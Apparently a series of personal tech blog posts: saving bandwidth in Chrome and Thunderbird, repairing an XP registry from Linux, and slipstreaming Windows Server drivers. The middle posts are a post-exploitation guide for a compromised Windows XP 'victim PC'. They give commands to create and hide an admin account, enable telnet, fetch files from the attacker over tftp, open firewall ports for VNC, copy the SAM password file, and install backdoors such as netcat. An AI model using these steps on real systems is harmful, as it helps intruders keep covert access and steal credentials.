Since last 3 months, I am on an shitty internet connection which as a download limit of just 15 GB and costs an arm and leg. But stuck with it because the only other option in my area is just as bad. So now it happened that this 15 GB download limit was getting over within 4-5 days and rest of the duration the bandwidth gets throttled to snail like 512 Kbps for rest of the month.  All of this data was gone while I was not using any bandwidth intensive application. No torrents, videos, music streaming. Just the usual work on Opera and Chrome browsers and email.

This was bugging me too much because my current ISP (Failtel Fraudband) is notorious for shady business practices and ripping off customers. So to be doubly sure, I downloaded and installed Glasswire application to monitor my bandwidth usage.

Bandwidth usage report

Bandwidth usage report

As clear from the report above, Google Chrome is the largest bandwidth hog even though it’s my secondary browser and it mostly runs in background while I do my work on Opera. All of this bandwidth was consumed in just about 2 hours that I had it on.  While looking for a solution, I  found many people complaining of the same thing and found out that Google Chrome pre-fetches data from some most frequented websites and also automatically downloads some data from other links on the websites you are on.

Make webpages load faster

You can make webpages load faster by telling Google Chrome to prerender (preload) links. Google Chrome does this by predicting what links you might click, preparing them to load instantly for you.

For example:

  • When you’re browsing a blog, you might click “next post” when you’re done reading. The blog can tell Google Chrome to pre-load the “next post,” so the page shows instantly when you click it.
  • When you’re typing a web address in the address bar, Chrome will begin to prerender that page if it’s confident about which site you’re likely to visit (based on your local history). This will make the page show up faster when you hit enter.
    Google’s Instant Pages search feature in Chrome is powered by Chrome’s prerendering technology.

From https://support.google.com/chrome/answer/1385029?hl=en

 

While this is a good option for connections with unlimited bandwidth, it is just a nuisance for others.  This means that the Chrome is pre-fetching data from websites which in a number of instances is just a waste of bandwidth. This option can be found by following steps as explained in above mentioned link:

  1. In the top-right corner of the browser window, click the Chrome menu icon .

  2. Select Settings.

  3. At the bottom of the page, click Show advanced settings.

  4. In the “Privacy” section, check “Prefetch resources to load pages more quickly.” If you want to undo this permission, simply uncheck the box.

As I wanted to save bandwidth, I unchecked the box.  After disabling this option, I kept Chrome running for half an hour and the bandwidth usage was minimal.

While looking for detailed logs, I also found out that Mozilla Thunderbird, which I use as my primary email client was also a big bandwidth hog, downloading 176 MB bandwidth in a single day. While I use it almost all day long, usage of this much data for text emails is way too much. By default, Thunderbird checks for messages every 10 minutes. I increased that interval to 30 minutes in Account Settings as visible in screenshot below.

Increase duration of checking messages in Thunderbird

Apart from that, a major bandwidth hog is the countless number of people sending messages with huge attachment, useless images and too many scammers and spammers with their malicious attachments. In the same menu, you can find option Synchronization & Storage.

Size limit for downloads in Thunderbird

In this, you can tell Thunderbird to not download any message bigger than your specified limit. I put in 1000 KB, but you can use any value you want. Additionally, the option just above “Synchronize the most recent” can also be given a lower value to decrease the amount of data spent on mostly un-needed traffic.

This work was done on Windows 7. I don’t know if the settings are same on Linux, but there is no reason that anything will be different.

 

Part 1

In this post, I’ll post more stuff that you can do to maintain access to any remote Windows XP computer. Previous post is here.


1. Creating Invisible Account

You can create a user “Admin” by running following command

c:windowssystem32net user admin admin /add

But this user will be visible on XP logon screen. To hide it, you’ll have to edit some registry settings
Open up Registry Editor and navigate to this key

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersionWinlogonSpecialAccountsUserList

Here, modify or create a DWORD Value by right-clicking the right side of the screen and adding DWORD Value. Name of the value must be same as the account name (admin here) that you want to hide. Set the value data 0 to hide it and 0 to unhide.

2. Enabling Telnet

Telnet is one simple utility that you can use to maintain access without uploading any extra backdoor/software. Telnet server is disabled on most PCs by default. You’ll have to manually enable the service to start automatically

sc config telnet start= auto net start telnet

That’s it. Any service can be enabled using this command. Just replace telnet with the service of your choice.
Now you can use the account you created earlier to login any time you want.

In this post I’ll write about what to do once you gain administrative privileges on a Windows PC. There’s lot that you can do, depending upon your inclinations (I hope benign).
Don’t ask me how to get admin rights in first place. Figure that out yourself.
Maybe I’ll write something on that someday, but not now.

Anyhow, once you get in open a windows command shell.
Here are a few things you might like to do:

1) Uploading/downloading files

First thing you might do is uploading a few files of your choice. TFTP (Trivial File Transfer Protocol) is an excellent choice for this.
You need to start tftp service/daemon on your PC first and place the files you want to upload in the programs working directory. In most linux versions, its /tmp

Type the following command to upload netsh.exe file.

C:WINDOWS>tftp -i 192.168.1.10 GET netsh.exe netsh.exe

Here

-i specifies binary transfer mode

GET tells the victim PC to fetch the file from remote PC. You can use PUT to copy data onto a remote PC

192.168.1.10 is your ip

First netsh.exe is the file you want to upload

Second netsh.exe is the filename you want to keep in victim PC. You can change it to anything you want.

2. Editing network settings

The file netsh.exe is a Windows program for editing network related settings of a PC. Most XP PCs don’t have it by default. You’ll have to upload it. In this case, it’s used to open certain ports in Windows Firewall, that otherwise could be blocked. VNC uses ports 5900 and 5800 for communications. You can edit the firewall setings to unblock these ports by using these commands:

netsh firewall set portopening tcp 5800

netsh firewall set portopening tcp 5900

netsh.exe firewall set portopening udp 5900

This is just an example. You can use this command to block or unblock any port. Keep in mind, unblocking a particular port doesn’t mean the service/program that usually uses the port will start working. For example, unblocking port 23 and trying telnet will be of no use, unless telnet service is started on that PC.

3). Copying SAM

SAM file contains list of all the users and corresponding passwords in Windows. Though it’s encryption can be hard to break depending upon password strength, it’s a very juicy target. There are quite a few paid and free software to do that. It’s default location is

C:windowssystem32config

It’s not possible to copy the SAM file directly as it’s a protected system file. But there is a loophole here too. A backup copy of SAM is almost always located in

C:windowsrepair

You can copy this file to your own PC unlike original SAM.

4). Uploading a back-door

A back-door program for example netcat is necessary if you want to keep unrestricted access. netcat is supposed to be a good program, but most anti-virus programs detect it very easily. So it’s slightly out of fashion. If that’s the case, you can try using some script based back-doors like Matahari. It’s a perl script. Only downside is that the target PC should have perl installed which most windows PCs don’t have.
Linux fares better in this case. Another good option is VNC.

That’s enough for now. Let me know if you have any suggestions or corrections.


Few days back, my Windows XP got infected by a few viruses. Using infected pen drives seemed to be the reason. One particularly pesky virus was a script that started everytime I logged on even when I deleted the .vbs file manually. So I opened up regedit.exe and deleted every registry entry containing that file name. Bad move.
Next time I rebooted, I got the Welcome Screen, which I usually bypass. Clicking on my user name was not good enough to log in. It’d display, Loading User Settings and then come back to login screen without getting to desktop. I have a dual boot system with Linux as other OS (Using ntfs-3g it’s possible to read-write NTFS partitions from Linux). I could do most work on Linux but not gaming. I needed that XP back, reinstalling was not an option.
So….booted into Linux and fired up Google to look for some solution. There were many such cases but only one solution was applicable in my case, that is..restoring the registry.
There are many ways to restore registry one being using Windows Recovery Console. But that’s slow as it involved booting using XP cd and running commands to copy/rename files from crappy command line of Windows. Why use Windows command line, when you can read-write NTFS partitions from Linux itself!! :p
Here are the steps:-

First identify your XP partition on which it’s installed. In my system it was sda1.

Then make a new directory anywhere. Name it reg. Type
mkdir /reg

Now get into Windowssystemconfig directory.
Type
cd /mnt/sda1/Windows/system/config
Notice that / is used in linux not

Copy the following 5 files into Windowsrepair directory
software, system, security, sam and default

Now find your system restore folder on XP partition. It should be like
/mnt/sda1/System Volume Information/_restore{74AB4D58-11E9-4AAD-83C4-A8687AfE0C89}

Get into snapshots folder. There should be some folders there named RP** where ** stands for some number. Open the most recent folder and copy the following files

_REGISTRY_MACHINE_SAM
_REGISTRY_MACHINE_SECURITY
_REGISTRY_MACHINE_SOFTWARE
_REGISTRY_MACHINE_SYSTEM
_REGISTRY_USER_.DEFAULT

into reg folder you created previously.

Rename these files by deleting the _REGISTRY_MACHINE_ part from each one so that the new names are SAM, SECURITY, SOFTWARE, .DEFAULT and SYSTEM

Copy these 5 files to WindowsSystem32Config folder

Reboot, get to the welcome screen. You’ll be able to login using one account at least.
In my case I logged in using Administrator account. (only one visible). Then I created one account with same name as older on and got all my account settings and documents back.

If you don’t have linux, you can follow the instructions from this website.



There was something interesting to do in office this week. They needed to install Windows Server 2003 on a Sun Fire X4100 server so that it could be used for running an anti-virus solution. It had RedHat installed previously but they didn’t have license for Linux version of Symantac anti-virus.
  One’d think how difficult it could be..installing Windows…point, click, voila. It is actually like that in most of cases..but not in this one. Earlier it was Linux which needed  loads of tweaking, needed specialised drivers, dependencies and what not. But now, positions have changed. Linux supports most hardware out of the box unlike Windows.
 This became clear when we staretd the installation. It turned out that Windows didn’t have drivers for SCSI hard disc of the X4100.  We needed to provide drivers during the installation from an  external source..a floppy of all the things. Considering that the server had no support for floppy drive, it could be a USB floppy drive only, but owing to certain “politics”it was not an option.  Then I tried Sun Integrated Lights Out Manager. 
Logged in using console, used every command possible, changed IP address, but that didn’t work out either. This guide here  shows some of the steps used.
Then I adviced slipstreaming drivers inside the Server 2003 cd. I was told that they already did that. I asked the procedure and promptly banged my head on table. Their idea of slipstreaming was just copying the driver files on the cd and hoping that installer picks up drivers all by itself. No modifying other files to provide path of drivers or anything like that.
After I finishing damaging the table with my head, I downloaded another pdf  from Sun website and made them read the correct procedure. Its quite long for them..so there is a software called nLite  that can do all the dirty work in 4-5 point-click kind of steps.
No fun at all :|
All that ne needs to do is copying the Windows CD on hard disc. Give nLite the path of CD dump, drivers, chose option to make it bootable, unattended installation and what not…and click finish. It’ll make an ISO that you burn on a CD. That CD will work perfectly.
Mission accomplished.
I had same problem with my older motherboard that didnt support SATA disks. Same procedure worked in that case too.